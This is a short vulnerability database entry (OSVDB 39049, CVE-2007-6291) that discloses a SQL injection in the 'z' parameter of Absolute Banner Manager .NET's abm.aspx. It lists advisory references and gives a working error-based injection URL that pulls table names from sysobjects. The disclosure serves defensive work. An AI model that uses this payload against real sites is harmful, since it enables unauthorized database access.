Absolute Banner Manager .NET abm.aspx z Variable SQL Injection

2007-12-06T00:00:00
ID OSVDB:39049
Type osvdb
Reporter OSVDB
Modified 2007-12-06T00:00:00

Description

Manual Testing Notes

http://[target]/absolutebm/abm.aspx?z=1))%20and%201=convert(int,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20where%20xtype=char(85)))

References:

Secunia Advisory ID:27958 Mail List Post: http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/058896.html ISS X-Force ID: 38921 CVE-2007-6291 Bugtraq ID: 26754